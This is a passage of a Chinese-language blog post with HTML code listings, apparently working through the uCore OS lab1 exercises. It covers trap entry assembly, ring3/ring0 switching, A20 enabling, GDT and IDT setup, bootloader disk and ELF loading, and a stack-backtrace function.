class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">  #include &lt;memlayout<span class="number">.</span>h&gt;</span><br><span class="line"></span><br><span class="line"># vectors<span class="number">.</span>S sends all traps here.</span><br><span class="line"><span class="meta">.text</span></span><br><span class="line"><span class="meta">.globl</span> __alltraps</span><br><span class="line"><span class="symbol">__alltraps:</span></span><br><span class="line">    # <span class="keyword">push</span> registers to build a trap frame</span><br><span class="line">    # therefore make the stack look like a struct trapframe</span><br><span class="line">    pushl %ds</span><br><span class="line">    pushl %es</span><br><span class="line">    pushl %fs</span><br><span class="line">    pushl %gs</span><br><span class="line">    pushal</span><br><span class="line"></span><br><span class="line">    # load GD_KDATA <span class="keyword">into</span> %ds <span class="keyword">and</span> %es to set <span class="meta">up</span> data segments for kernel</span><br><span class="line">    movl $GD_KDATA, %eax</span><br><span class="line">    movw %ax, %ds</span><br><span class="line">    movw %ax, %es</span><br><span class="line"></span><br><span class="line">    # <span class="keyword">push</span> %esp to pass a pointer to the trapframe as an argument to trap()</span><br><span class="line">    pushl %esp</span><br><span class="line">    # <span class="keyword">call</span> trap(tf), where tf=%esp</span><br><span class="line">    <span class="keyword">call</span> trap</span><br><span class="line">    # <span class="keyword">pop</span> the pushed stack pointer</span><br><span class="line">    popl %esp</span><br><span class="line"></span><br><span class="line">    # return falls through to trapret...</span><br><span class="line"><span class="meta">.globl</span> __trapret</span><br><span class="line"><span class="symbol">__trapret:</span></span><br><span class="line">    # restore registers from stack</span><br><span class="line">    popal</span><br><span class="line"></span><br><span class="line">    # restore %ds, %es, %fs <span class="keyword">and</span> %gs</span><br><span class="line">    popl %gs</span><br><span class="line">    popl %fs</span><br><span class="line">    popl %es</span><br><span class="line">    popl %ds</span><br><span class="line"></span><br><span class="line">    # get rid of the trap number <span class="keyword">and</span> error code</span><br><span class="line">    addl <span class="number">$0</span>x8, %esp</span><br><span class="line">    <span class="keyword">iret</span></span><br></pre></td></tr></table></figure></li></ul><h5 id="4-切换特权级的过程">4) 切换特权级的过程</h5><h6 id="a-特权级提升">a. 特权级提升</h6><p>当通过陷入门<strong>从ring3切换至ring0（特权提升）</strong> 时</p><ul><li><p>在陷入的一瞬间，CPU会因为特权级的改变，索引TSS，切换<code>ss</code>和<code>esp</code>为内核栈，并<strong>按顺序自动</strong>压入<code>user_ss</code>、<code>user_esp</code>、<code>user_eflags</code>、<code>user_cs</code>、<code>old_eip</code>以及<code>err</code>。</p><blockquote><p>需要注意的是，CPU先切换到内核栈，此时的<code>esp</code>与<code>ss</code>不再指向用户栈。但此时CPU却可以再将用户栈地址存入内核栈。这种操作可能是依赖硬件来完成的。</p></blockquote><blockquote><p>如果没有err，则CPU会自动压入0。</p></blockquote></li><li><p>之后CPU会在中断处理例程入口处，先将剩余的段寄存器以及所有的通用寄存器压栈，构成一个<code>trapframe</code>。然后将该<code>trapframe</code>传入给真正的中断处理例程并执行。</p></li><li><p>该处理例程会判断传入的中断数(<code>trapno</code>)并执行特定的代码。在<strong>提升特权级的代码</strong>中，程序会处理传入的<code>trapframe</code>信息中的<code>CS、DS、eflags</code>寄存器，修改上面的<strong>DPL、CPL与IOPL</strong>以达到提升特权的目的。</p></li><li><p>将修改后的<code>trapframe</code><strong>压入用户栈</strong>（这一步没有修改<code>user_esp</code>寄存器），并设置中断处理例程结束后将要弹出<code>esp</code>寄存器的值为<strong>用户栈的新地址</strong>（与刚刚不同，这一步修改了<strong>将要恢复</strong>的<code>user_esp</code>寄存器）。</p><blockquote><p>注意此时的用户栈地址指向的是修改后的<code>trapframe</code>。</p></blockquote><p>这样在退出中断处理程序，准备恢复上下文的时候，首先弹出的栈寄存器值是修改后的用户栈地址，其次弹出的通用寄存器、段寄存器等等都是存储于用户栈中的<code>trapframe</code>。</p><blockquote><p>为什么要做这么奇怪的操作呢？ 因为恢复<code>esp</code>寄存器的指令<strong>只有一条<code>pop %esp</code></strong></p><p>(当前环境下的<code>iret</code>指令不会弹出栈地址)。</p><p>正常情况下，中断处理例程结束，恢复<code>esp</code>寄存器后，<code>esp</code>指向的还是内核栈。</p><p>但我们的目的是切换回用户栈，则此时只能修改原先要恢复的<code>esp</code>值，通过该指令切换到用户栈。</p></blockquote><blockquote><p>思考一下，进入中断处理程序前，上下文<strong>保存在内核栈</strong>。但将要恢复回上下文的数据却<strong>存储于用户栈</strong>。</p></blockquote></li><li><p>在内核中，<code>将修改后的trapframe压入用户栈</code>这一步，需要舍弃<code>trapframe</code>中末尾两个旧的<code>ss</code>和<code>esp</code>寄存器数据，因为<code>iret</code>指令的特殊性：</p><ul><li><p><code>iret</code>指令的功能如下</p><blockquote><p><code>iret</code>指令会按顺序依次弹出<code>eip</code>、<code>cs</code>以及<code>eflag</code>的值到特定寄存器中，然后从新的<code>cs:ip</code>处开始执行。如果特权级发生改变，则还会在弹出<code>eflag</code>后再依次弹出<code>esp</code>与<code>ss</code>寄存器值。</p></blockquote></li><li><p>由于<code>iret</code>前后特权级不发生改变（<strong>[中断中]ring0 -&gt; ring0 [中断后]</strong>），故<code>iret</code>指令不会弹出<code>esp</code>和<code>ss</code>寄存器值。如果这两个寄存器也被复制进用户栈，则相比于进入中断前的用户栈地址，<code>esp</code>最终会抬高8个字节，可能造成很严重的错误。</p></li></ul></li></ul><h6 id="b-特权级降低">b. 特权级降低</h6><p>通过陷入门<strong>从ring0切换至ring3（特权降低）</strong> 的过程与特权提升的操作基本一样，不过有几个不同点需要注意一下</p><ul><li><p>与ring3调用中断不同，当ring0调用中断时，进入中断前和进入中断后的这个过程，栈不发生改变。</p><blockquote><p>因为在调用中断前的权限已经处于ring0了，而中断处理程序里的权限也是ring0，所以这一步陷入操作的特权级没有发生改变，故不需要访问TSS并重新设置<code>ss</code> 、<code>esp</code>寄存器。</p></blockquote></li><li><p>修改后的<code>trapFrame</code>不需要像上面那样保存至将要使用的栈，因为当前环境下<code>iret</code>前后特权级会发生改变，执行该命令会弹出<code>ss</code>和<code>esp</code>，所以可以通过<code>iret</code>来设置返回时的栈地址。</p></li></ul><h2 id="练习解答">练习解答</h2><h3 id="1-练习1">1. 练习1</h3><blockquote><p>理解通过make生成执行文件的过程.</p></blockquote><ul><li>操作系统镜像文件ucore.img是如何一步一步生成的？执行命令<code>make v=</code>，通过阅读其输出的步骤，我们可以得知<ul><li><p>make执行将所有的源代码编译成对象文件，并分别链接形成<code>kernel</code>、<code>bootblock</code>文件。</p></li><li><p>使用<code>dd</code>命令，将生成的两个文件的数据拷贝至img文件中，形成映像文件。</p><blockquote><p><code>dd</code>命令与<code>cp</code>命令不同，该命令针对于磁盘，功能更加底层。</p></blockquote></li></ul></li><li>一个被系统认为是符合规范的硬盘主引导扇区的特征是什么？<ul><li><p>阅读源码<code>lab1/tools/sign.c</code>，可以发现，<strong>符合规范的MBR特征是其512字节数据的最后两个字节是<code>0x55</code>、<code>0xAA</code></strong></p></li><li><p>以下是部分源码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 读取文件至内存中</span></span><br><span class="line"><span class="comment">// ....</span></span><br><span class="line"><span class="comment">// 修改512字节的最后两个字节为magic number</span></span><br><span class="line">buf[<span class="number">510</span>] = <span class="number">0x55</span>;</span><br><span class="line">buf[<span class="number">511</span>] = <span class="number">0xAA</span>;</span><br><span class="line"><span class="comment">// 写入内存中的数据至新文件中</span></span><br><span class="line"><span class="comment">// ....</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="2-练习2">2. 练习2</h3><blockquote><p>使用qemu执行并调试lab1中的软件。</p></blockquote><ul><li><p>修改<code>tools/gdbinit</code>为</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">file obj/bootblock.o</span><br><span class="line">set architecture i8086</span><br><span class="line">target remote :<span class="number">1234</span></span><br><span class="line">b* <span class="number">0x7c00</span></span><br><span class="line"></span><br><span class="line">define hook-stop</span><br><span class="line">x/i $eip</span><br><span class="line">end</span><br><span class="line"><span class="keyword">continue</span></span><br></pre></td></tr></table></figure><ul><li>gdb脚本中的<code>define hook-stop ... end</code>，可以在每次gdb断下时自动执行内部的指令。上面gdb脚本中的<code>define .. end</code>告诉gdb在每次断下时输出下一条指令，方便调试。</li><li>如果想单步调试BIOS，则可以删除<code>continue</code>。这样gdb就会在<code>0xfff0</code>处断下，然后我们就可以自由的单步跟踪。</li></ul></li><li><p>之后执行<code>make debug</code>命令，即可自动打开qemu与已经连接完成的gdb。</p></li><li><p>有个坑点：远程连接qemu时，<strong>最好不要使用pwndbg插件</strong>。因为使用该插件会导致连接到qemu后无法操作gdb。</p><blockquote><p><code>peda</code>插件可以正常使用。</p></blockquote></li><li><p>调试过程中有一个点需要注意：BIOS的前几条指令在GDB中都需要手动加上段寄存器的值，否则会显示错误，因为<code>cs</code>寄存器<strong>初始时非零</strong>；同时gdb默认只输出<code>$ip</code> 所指向地址的指针，而不是<code>cs:ip</code>。</p><ul><li><p>这是错误的指令输出</p><p><img src="/2020/08/uCore-1/gdbwrong.png" alt="img"></p></li><li><p>这是正确的指令输出</p><p><img src="/2020/08/uCore-1/gdbgood.png" alt="img"></p></li></ul><blockquote><p>最后感谢<a href="https://github.com/M-ouse">@2st</a>师傅在BIOS调试中提供了帮助。</p></blockquote></li></ul><h3 id="3-练习3">3. 练习3</h3><blockquote><p>分析bootloader进入保护模式的过程.</p></blockquote><ul><li><p>为何开启A20，以及如何开启A20？</p><ul><li><p>Intel早期的8086 CPU提供了20根地址线，但寄存器只有16位，所以使用<strong>段寄存器值 &lt;&lt; 4 + 段内偏移值</strong>的方法来访问到所有内存，但按这种方式来计算出的地址的最大值为1088KB，超过20根地址线所能表示的范围，会发生“回卷”（和整数溢出有点类似）。但下一代的基于Intel 80286 CPU的计算机系统提供了24根地址线，当CPU计算出的地址超过1MB时便<strong>不会发生回卷</strong>，而这就造成了<strong>向下不兼容</strong>。为了保持完全的向下兼容性，IBM在计算机系统上加个硬件逻辑来模仿早期的回绕特征，而这就是<strong>A20 Gate</strong>。</p></li><li><p>A20 Gate的方法是把A20地址线控制和键盘控制器的一个输出进行AND操作，这样来控制A20地址线的打开（使能）和关闭（屏蔽\禁止）。一开始时A20地址线控制是被屏蔽的（总为0），直到系统软件通过一定的IO操作去打开它。当A20 地址线控制禁止时，则程序就像在8086中运行，1MB以上的地址不可访问；保护模式下A20地址线控制必须打开。A20控制打开后，内存寻址将不会发生回卷。</p></li><li><p>在当前环境中，所用到的键盘控制器8042的IO端口只有0x60和0x64两个端口。8042通过这些端口给键盘控制器或键盘发送命令或读取状态。输出端口P2用于特定目的。位0（P20引脚）用于实现CPU复位操作，位1（P21引脚）用于控制A20信号线的开启与否。<br><img src="/2020/08/uCore-1/8042Keyboard.png" alt="img"><br>我们要操作的位置是8042三个内部端口中<strong>输出端口</strong>的bit 1上，其写入该端口的做法为：</p><blockquote><p>写Output Port：向64h发送0xd1命令，然后向60h写入Output Port的数据</p></blockquote></li></ul></li><li><p>启动A20的汇编代码如下</p>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">    # Enable A20:</span><br><span class="line">    #  For backwards compatibility with the earliest PCs, physical</span><br><span class="line">    #  address line <span class="number">20</span> is tied low, so that addresses higher than</span><br><span class="line">    #  1MB wrap around to <span class="meta">zero</span> by <span class="meta">default</span>. This code undoes this.</span><br><span class="line"><span class="symbol">seta20.1:</span></span><br><span class="line">    # 读取<span class="number">0x64</span>端口——读Status Register</span><br><span class="line">    inb <span class="number">$0</span>x64, %al    # Wait for <span class="keyword">not</span> busy(<span class="number">8042</span> input buffer empty).</span><br><span class="line">    testb <span class="number">$0</span>x2, %al   # 读取到<span class="number">2</span>则表明缓冲区中没有数据</span><br><span class="line">  <span class="keyword">jnz</span> seta20<span class="number">.1</span></span><br><span class="line"></span><br><span class="line">    movb <span class="number">$0</span>xd1, %al  # <span class="number">0xd1</span> -&gt; port <span class="number">0x64</span></span><br><span class="line">  outb %al, <span class="number">$0</span>x64  # <span class="number">0xd1</span> means: write data to <span class="number">8042</span><span class="string">&#x27;s P2 port</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">seta20.2:</span></span><br><span class="line"><span class="string">    inb $0x64, %al   # Wait for not busy(8042 input buffer empty).</span></span><br><span class="line"><span class="string">    testb $0x2, %al</span></span><br><span class="line"><span class="string">  jnz seta20.2</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    movb $0xdf, %al  # 0xdf -&gt; port 0x60</span></span><br><span class="line"><span class="string">    outb %al, $0x60  # 0xdf = 11011111, means set P2&#x27;</span>s A20 bit(the <span class="number">1</span> bit) to <span class="number">1</span></span><br></pre></td></tr></table></figure></li><li><p>如何初始化GDT表</p><ul><li>设置GDT中的第一项描述符为空。</li><li>设置GDT中的第二项描述符为代码段使用，其属性为可读写可执行。</li><li>设置GDT中的第三项描述符为数据段使用，其属性为可读写。</li></ul><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">  # Bootstrap GDT</span><br><span class="line"><span class="meta">.p2align</span> <span class="number">2</span>                                          # force <span class="number">4</span> <span class="built_in">byte</span> alignment</span><br><span class="line"><span class="symbol">gdt:</span></span><br><span class="line">    SEG_NULLASM                                     # null <span class="built_in">seg</span></span><br><span class="line">    SEG_ASM(STA_X|STA_R, <span class="number">0x0</span>, <span class="number">0xffffffff</span>)           # code <span class="built_in">seg</span> for bootloader <span class="keyword">and</span> kernel</span><br><span class="line">    SEG_ASM(STA_W, <span class="number">0x0</span>, <span class="number">0xffffffff</span>)                 # data <span class="built_in">seg</span> for bootloader <span class="keyword">and</span> kernel</span><br><span class="line"><span class="symbol"></span></span><br><span class="line"><span class="symbol">gdtdesc:</span></span><br><span class="line"><span class="meta">    .word</span> <span class="number">0x17</span>                                      # sizeof(gdt) - <span class="number">1</span></span><br><span class="line"><span class="meta">    .long</span> gdt                                       # address gdt</span><br></pre></td></tr></table></figure></li><li><p>如何使能和进入保护模式</p><ul><li>将%cr0寄存器置1。</li><li>%cr0寄存器置1后，长跳转<code>ljmp $PROT_MODE_CSEG, $protcseg</code>以更新cs基地址。</li></ul></li></ul><h3 id="4-练习4">4. 练习4</h3><blockquote><p>分析bootloader加载ELF格式的OS的过程.</p></blockquote><ul><li><p>bootloader如何读取硬盘扇区的？</p><ul><li><p>bootloader让CPU进入保护模式后，下一步的工作就是从硬盘上加载并运行OS。考虑到实现的简单性，bootloader的访问硬盘都是LBA模式的PIO（Program IO）方式，即所有的IO操作是通过CPU访问硬盘的IO地址寄存器完成。硬盘相关的IO地址与功能如下:</p><table><thead><tr><th style="text-align:center">IO地址</th><th style="text-align:left">功能</th></tr></thead><tbody><tr><td style="text-align:center">0x1f0</td><td style="text-align:left">读数据，当0x1f7不为忙状态时，可以读。</td></tr><tr><td style="text-align:center">0x1f2</td><td style="text-align:left">要读写的扇区数，每次读写前，你需要表明你要读写几个扇区。最小是1个扇区</td></tr><tr><td style="text-align:center">0x1f3</td><td style="text-align:left">如果是LBA模式，就是LBA参数的0-7位</td></tr><tr><td style="text-align:center">0x1f4</td><td style="text-align:left">如果是LBA模式，就是LBA参数的8-15位</td></tr><tr><td style="text-align:center">0x1f5</td><td style="text-align:left">如果是LBA模式，就是LBA参数的16-23位</td></tr><tr><td style="text-align:center">0x1f6</td><td style="text-align:left">第0~3位：如果是LBA模式就是24-27位 第4位：为0主盘；为1从盘</td></tr><tr><td style="text-align:center">0x1f7</td><td style="text-align:left">状态和命令寄存器。操作时先给命令，再读取，如果不是忙状态就从0x1f0端口读数据</td></tr></tbody></table></li><li><p>当前 硬盘数据是储存到硬盘扇区中，一个扇区大小为512字节。读一个扇区的流程大致如下：</p><ul><li>等待磁盘准备好</li><li>发出读取扇区的命令</li><li>等待磁盘准备好</li><li>把磁盘扇区数据读到指定内存</li></ul></li><li><p>相关实现代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* waitdisk - wait for disk ready */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">waitdisk</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取并判断磁盘是否处于忙碌状态</span></span><br><span class="line">    <span class="keyword">while</span> ((<span class="built_in">inb</span>(<span class="number">0x1F7</span>) &amp; <span class="number">0xC0</span>) != <span class="number">0x40</span>)</span><br><span class="line">        <span class="comment">/* do nothing */</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/* readsect - read a single sector at @secno into @dst */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">readsect</span><span class="params">(<span class="type">void</span> *dst, <span class="type">uint32_t</span> secno)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 等待磁盘准备就绪</span></span><br><span class="line">    <span class="built_in">waitdisk</span>();</span><br><span class="line">    <span class="comment">// 设置磁盘参数</span></span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F2</span>, <span class="number">1</span>);                         <span class="comment">// 读取1个扇区</span></span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F3</span>, secno &amp; <span class="number">0xFF</span>);              <span class="comment">// 0x1F3-0x1F6 设置LBA模式的参数</span></span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F4</span>, (secno &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F5</span>, (secno &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xFF</span>);</span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F6</span>, ((secno &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xF</span>) | <span class="number">0xE0</span>);</span><br><span class="line">    <span class="built_in">outb</span>(<span class="number">0x1F7</span>, <span class="number">0x20</span>);                      <span class="comment">// 设置磁盘命令为“读取”</span></span><br><span class="line">    <span class="comment">// 等待磁盘准备就绪</span></span><br><span class="line">    <span class="built_in">waitdisk</span>();</span><br><span class="line">    <span class="comment">// 从0x1F0端口处读数据</span></span><br><span class="line">    <span class="built_in">insl</span>(<span class="number">0x1F0</span>, dst, SECTSIZE / <span class="number">4</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>bootloader是如何加载ELF格式的OS？</p><ul><li><p>bootloader先将ELF格式的OS加载到地址<code>0x10000</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">readseg</span>((<span class="type">uintptr_t</span>)ELFHDR, SECTSIZE * <span class="number">8</span>, <span class="number">0</span>);</span><br></pre></td></tr></table></figure></li><li><p>之后通过比对ELF的magic number来判断读入的ELF文件是否正确。</p></li><li><p>再将ELF中每个段都加载到特定的地址。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// load each program segment (ignores ph flags)</span></span><br><span class="line">ph = (<span class="keyword">struct</span> proghdr *)((<span class="type">uintptr_t</span>)ELFHDR + ELFHDR-&gt;e_phoff);</span><br><span class="line">eph = ph + ELFHDR-&gt;e_phnum;</span><br><span class="line"><span class="keyword">for</span> (; ph &lt; eph; ph ++)</span><br><span class="line">    <span class="built_in">readseg</span>(ph-&gt;p_va &amp; <span class="number">0xFFFFFF</span>, ph-&gt;p_memsz, ph-&gt;p_offset);</span><br></pre></td></tr></table></figure></li><li><p>最后跳转至ELF文件的程序入口点(entry point)。</p></li></ul></li></ul><h3 id="5-练习5">5. 练习5</h3><blockquote><p>实现函数调用堆栈跟踪函数.</p></blockquote><ul><li><p>具体实现如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">+|  栈底方向    | 高位地址</span></span><br><span class="line"><span class="comment"> |    ...       |</span></span><br><span class="line"><span class="comment"> |    ...       |</span></span><br><span class="line"><span class="comment"> |  参数3       |</span></span><br><span class="line"><span class="comment"> |  参数2       |</span></span><br><span class="line"><span class="comment"> |  参数1       |</span></span><br><span class="line"><span class="comment"> |  返回地址     |</span></span><br><span class="line"><span class="comment"> |  上一层[ebp]  | &lt;-------- [ebp]</span></span><br><span class="line"><span class="comment"> |  局部变量     |  低位地址</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">print_stackframe</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 读取当前栈帧的ebp和eip</span></span><br><span class="line">    <span class="type">uint32_t</span> ebp = <span class="built_in">read_ebp</span>();</span><br><span class="line">    <span class="type">uint32_t</span> eip = <span class="built_in">read_eip</span>();</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">uint32_t</span> i = <span class="number">0</span>; ebp != <span class="number">0</span> &amp;&amp; i &lt; STACKFRAME_DEPTH; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 读取</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;ebp:0x%08x eip:0x%08x args:&quot;</span>, ebp, eip);</span><br><span class="line">        <span class="type">uint32_t</span>* args = (<span class="type">uint32_t</span>*)ebp + <span class="number">2</span> ;</span><br><span class="line">        <span class="keyword">for</span>(<span class="type">uint32_t</span> j = <span class="number">0</span>; j &lt; <span class="number">4</span>; j++)</span><br><span class="line">            <span class="built_in">cprintf</span>(<span class="string">&quot;0x%08x &quot;</span>, args[j]);</span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">        <span class="comment">// eip指向异常指令的下一条指令，所以要减1</span></span><br><span class="line">        <span class="built_in">print_debuginfo</span>(eip<span class="number">-1</span>);</span><br><span class="line">        <span class="comment">// 将ebp 和eip设置为上一个栈帧的ebp和eip</span></span><br><span class="line">        <span class="comment">//  注意要先设置eip后设置ebp，否则当ebp被修改后，eip就无法找到正确的位置</span></span><br><span class="line">        eip = *((<span class="type">uint32_t</span>*)ebp + <span class="number">1</span>);</span><br><span class="line">        ebp = *(<span class="type">uint32_t</span>*)ebp;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>有几个点需要注意一下</p><ul><li>栈的方向是从高地址向低地址增长，切勿弄错方向。</li><li>指针运算要格外小心，避免因为错误的运算顺序(例如先相加，再强制转换为指针类型)而导致指针的运算错误。</li><li><code>eip</code>指向异常指令的下一条指令，所以要传入<code>print_debuginfo</code>的参数为<code>eip-1</code></li><li>在切换栈帧时，先切换<code>eip</code>，后切换<code>ebp</code>，两者顺序不能颠倒。原因是当先切换ebp后，再切换的eip是已切换后的栈帧的上一个栈帧eip。eip隔着一个栈帧进行了切换，会导致输出错误。</li><li>如果想与标准答案比对自己的输出信息是否正确，请运行<code>labcodes_answer/kern/debug/kdebug.c</code>中的<code>print_stackframe</code>.</li></ul></li></ul><h3 id="6-练习6">6. 练习6</h3><blockquote><p>完善中断初始化和处理</p></blockquote><ul><li><p>中断描述符表（也可简称为保护模式下的中断向量表）中一个表项占多少字节？其中哪几位代表中断处理代码的入口？</p><ul><li><p>一个表项的结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Gate descriptors for interrupts and traps */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">gatedesc</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> gd_off_15_0 : <span class="number">16</span>;        <span class="comment">// low 16 bits of offset in segment</span></span><br><span class="line">    <span class="type">unsigned</span> gd_ss : <span class="number">16</span>;            <span class="comment">// segment selector</span></span><br><span class="line">    <span class="type">unsigned</span> gd_args : <span class="number">5</span>;            <span class="comment">// # args, 0 for interrupt/trap gates</span></span><br><span class="line">    <span class="type">unsigned</span> gd_rsv1 : <span class="number">3</span>;            <span class="comment">// reserved(should be zero I guess)</span></span><br><span class="line">    <span class="type">unsigned</span> gd_type : <span class="number">4</span>;            <span class="comment">// type(STS_&#123;TG,IG32,TG32&#125;)</span></span><br><span class="line">    <span class="type">unsigned</span> gd_s : <span class="number">1</span>;                <span class="comment">// must be 0 (system)</span></span><br><span class="line">    <span class="type">unsigned</span> gd_dpl : <span class="number">2</span>;            <span class="comment">// descriptor(meaning new) privilege level</span></span><br><span class="line">    <span class="type">unsigned</span> gd_p : <span class="number">1</span>;                <span class="comment">// Present</span></span><br><span class="line">    <span class="type">unsigned</span> gd_off_31_16 : <span class="number">16</span>;        <span class="comment">// high bits of offset in segment</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>该表项的大小为<code>16+16+5+3+4+1+2+1+16 == 8*8</code>bit，即<strong>8字节</strong>。</p></li><li><p>根据IDT表项的结构，我们可以得知，IDT表项的第二个成员<code>gd_ss</code>为段选择子，第一个成员<code>gd_off_15_0</code>和最后一个成员<code>gd_off_31_16</code>共同组成一个段内偏移地址。根据段选择子和段内偏移地址就可以得出中断处理程序的地址。</p></li></ul></li><li><p>编程完善kern/trap/trap.c中对中断向量表进行初始化的函数idt_init.</p><ul><li><p>具体实现如下，详细信息以注释的形式写入代码中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">idt_init</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// __vectors定义于vector.S中</span></span><br><span class="line">  <span class="keyword">extern</span> <span class="type">uintptr_t</span> __vectors[];</span><br><span class="line">  <span class="type">int</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="built_in">sizeof</span>(idt) / <span class="built_in">sizeof</span>(<span class="keyword">struct</span> gatedesc); i ++)</span><br><span class="line">      <span class="comment">// 目标idt项为idt[i]</span></span><br><span class="line">      <span class="comment">// 该idt项为内核代码，所以使用GD_KTEXT段选择子</span></span><br><span class="line">      <span class="comment">// 中断处理程序的入口地址存放于__vectors[i]</span></span><br><span class="line">      <span class="comment">// 特权级为DPL_KERNEL</span></span><br><span class="line">      <span class="built_in">SETGATE</span>(idt[i], <span class="number">0</span>, GD_KTEXT, __vectors[i], DPL_KERNEL);</span><br><span class="line">  <span class="comment">// 设置从用户态转为内核态的中断的特权级为DPL_USER</span></span><br><span class="line">  <span class="built_in">SETGATE</span>(idt[T_SWITCH_TOK], <span class="number">0</span>, GD_KTEXT, __vectors[T_SWITCH_TOK], DPL_USER);</span><br><span class="line">  <span class="comment">// 加载该IDT</span></span><br><span class="line">  <span class="built_in">lidt</span>(&amp;idt_pd);</span><br><span 